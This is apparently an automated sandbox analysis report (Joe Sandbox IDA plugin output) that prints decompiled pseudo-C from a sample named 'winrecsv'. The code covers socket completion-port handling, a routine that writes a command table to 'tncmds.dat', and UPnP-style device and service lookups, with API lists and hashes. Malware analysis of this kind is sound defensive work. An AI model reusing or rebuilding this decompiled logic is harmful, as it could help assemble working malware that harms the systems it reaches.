                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}
















                                                                                  0x0040ebea
                                                                                  0x0040ebec
                                                                                  0x0040ebee
                                                                                  0x0040ed76
                                                                                  0x0040ed8d
                                                                                  0x0040ed92
                                                                                  0x0040eda0
                                                                                  0x0040eda7
                                                                                  0x0040edac
                                                                                  0x0040edb9
                                                                                  0x0040edbf
                                                                                  0x00000000
                                                                                  0x0040edbf
                                                                                  0x0040ec06
                                                                                  0x0040ec0f
                                                                                  0x0040ec12
                                                                                  0x0040ecd5
                                                                                  0x0040ece7
                                                                                  0x0040ecf0
                                                                                  0x0040ed0b
                                                                                  0x0040ed23
                                                                                  0x0040ed2d
                                                                                  0x0040ed34
                                                                                  0x0040ed38
                                                                                  0x0040ed42
                                                                                  0x0040ed51
                                                                                  0x0040ed60
                                                                                  0x0040ed71
                                                                                  0x0040ecf2
                                                                                  0x0040ecf2
                                                                                  0x0040ecf5
                                                                                  0x0040ecf8
                                                                                  0x0040ed06
                                                                                  0x0040ed06
                                                                                  0x0040ecd7
                                                                                  0x0040ece6
                                                                                  0x0040ece6
                                                                                  0x0040ec18
                                                                                  0x0040ec18
                                                                                  0x0040ec1b
                                                                                  0x0040edce
                                                                                  0x0040edce
                                                                                  0x0040ec21
                                                                                  0x0040ec27
                                                                                  0x0040ec43
                                                                                  0x0040ec54
                                                                                  0x0040ec6c
                                                                                  0x0040ec76
                                                                                  0x0040ec80
                                                                                  0x0040ec84
                                                                                  0x0040ec88
                                                                                  0x0040ec9a
                                                                                  0x0040eca6
                                                                                  0x0040ecaa
                                                                                  0x0040ecb4
                                                                                  0x0040ecbb
                                                                                  0x00000000
                                                                                  0x0040ecc1
                                                                                  0x0040ecc1
                                                                                  0x0040eccd
                                                                                  0x0040eccd
                                                                                  0x0040ec29
                                                                                  0x0040ec3b
                                                                                  0x0040ec3b
                                                                                  0x0040ec27
                                                                                  0x0040ec1b

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							_v28 = CreateFileW("C:\Users\frontdesk\tncmds.dat", 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}





















                                                                                  0x00404588
                                                                                  0x00404591
                                                                                  0x0040459b
                                                                                  0x0040459f
                                                                                  0x004045a4
                                                                                  0x004045ac
                                                                                  0x004045b6
                                                                                  0x004045bb
                                                                                  0x004045be
                                                                                  0x004045c5
                                                                                  0x004045cb
                                                                                  0x004045cf
                                                                                  0x004045d3
                                                                                  0x004045e5
                                                                                  0x004045e8
                                                                                  0x004045ee
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404603
                                                                                  0x00404612
                                                                                  0x00404621
                                                                                  0x0040462d
                                                                                  0x00404648
                                                                                  0x00404654
                                                                                  0x00404664
                                                                                  0x00404678
                                                                                  0x004046a6
                                                                                  0x004046b2
                                                                                  0x004046ce
                                                                                  0x004046d3
                                                                                  0x004046d6
                                                                                  0x00404614
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x004045e2
                                                                                  0x00000000
                                                                                  0x00404612
                                                                                  0x004046e5
                                                                                  0x004046e7
                                                                                  0x004046f7
                                                                                  0x004046fc
                                                                                  0x00404702
                                                                                  0x00404704
                                                                                  0x00404706
                                                                                  0x00404710
                                                                                  0x00404710
                                                                                  0x00404704
                                                                                  0x00404718
                                                                                  0x00404724
                                                                                  0x00404726
                                                                                  0x00404746
                                                                                  0x00404749
                                                                                  0x0040474d
                                                                                  0x0040474f
                                                                                  0x00404761
                                                                                  0x00404764
                                                                                  0x0040476a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040477b
                                                                                  0x00404791
                                                                                  0x004047a2
                                                                                  0x0040475b
                                                                                  0x0040475b
                                                                                  0x0040475e
                                                                                  0x0040475e
                                                                                  0x004047ae
                                                                                  0x004047b8
                                                                                  0x004047b8
                                                                                  0x0040474d
                                                                                  0x00404726
                                                                                  0x004045c5
                                                                                  0x004047c3
                                                                                  0x004047d1

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(C:\Users\user\tncmds.dat,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Strings
                                                                                  • C:\Users\user\tncmds.dat, xrefs: 0040473B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID: C:\Users\user\tncmds.dat
                                                                                  • API String ID: 2945370292-1428318279
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"deviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cc96
                                                                                  0x0040cc9d
                                                                                  0x0040cca7
                                                                                  0x0040ccb0
                                                                                  0x0040ccb8
                                                                                  0x0040ccc8
                                                                                  0x0040ccda
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x0040ccd7
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd54
                                                                                  0x0040cd5f
                                                                                  0x0040cd64
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdd1
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cdd3
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040ccda
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"serviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cab6
                                                                                  0x0040cabd
                                                                                  0x0040cac7
                                                                                  0x0040cad0
                                                                                  0x0040cad8
                                                                                  0x0040cae8
                                                                                  0x0040cafa
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x0040caf7
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb74
                                                                                  0x0040cb7f
                                                                                  0x0040cb84
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbf1
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cbf3
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cafa
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E330(intOrPtr __eax, void* _a4) {
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t20;
                                                                                  				long _t28;
                                                                                  				long _t37;
                                                                                  				intOrPtr _t45;
                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                  				long _t49;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t53 = _a4;
                                                                                  				_t45 = __eax;
                                                                                  				if(_t53 != 0xffffffff) {
                                                                                  					_t48 = __eax + 0x20;
                                                                                  					_t37 = 0;
                                                                                  					EnterCriticalSection(_t48);
                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                  					if(_t20 != 0) {
                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                  							if(_t20 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  							}
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t37 = 1;
                                                                                  					}
                                                                                  					L7:
                                                                                  					LeaveCriticalSection(_t48);
                                                                                  					if(_t37 == 0) {
                                                                                  						_t49 = E00408E40(0x284);
                                                                                  						_t55 = _t54 + 4;
                                                                                  						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}













                                                                                  0x0040e331
                                                                                  0x0040e336
                                                                                  0x0040e33b
                                                                                  0x0040e344
                                                                                  0x0040e348
                                                                                  0x0040e34a
                                                                                  0x0040e350
                                                                                  0x0040e355
                                                                                  0x0040e357
                                                                                  0x0040e35f
                                                                                  0x0040e367
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e369
                                                                                  0x00000000
                                                                                  0x0040e367
                                                                                  0x0040e36b
                                                                                  0x0040e36b
                                                                                  0x0040e36d
                                                                                  0x0040e36e
                                                                                  0x0040e376
                                                                                  0x0040e389
                                                                                  0x0040e38b
                                                                                  0x0040e390
                                                                                  0x0040e42d
                                                                                  0x0040e42e
                                                                                  0x0040e43c
                                                                                  0x0040e396
                                                                                  0x0040e39b
                                                                                  0x0040e3a3
                                                                                  0x0040e3a9
                                                                                  0x0040e3af
                                                                                  0x0040e3b7
                                                                                  0x0040e3d4
                                                                                  0x0040e423
                                                                                  0x0040e428
                                                                                  0x0040e42b
                                                                                  0x00000000
                                                                                  0x0040e3d6
                                                                                  0x0040e3d6
                                                                                  0x0040e3dc
                                                                                  0x0040e3e0
                                                                                  0x0040e3e6
                                                                                  0x0040e3ec
                                                                                  0x0040e3f0
                                                                                  0x0040e3f6
                                                                                  0x0040e400
                                                                                  0x0040e406
                                                                                  0x0040e410
                                                                                  0x0040e416
                                                                                  0x0040e421
                                                                                  0x0040e421
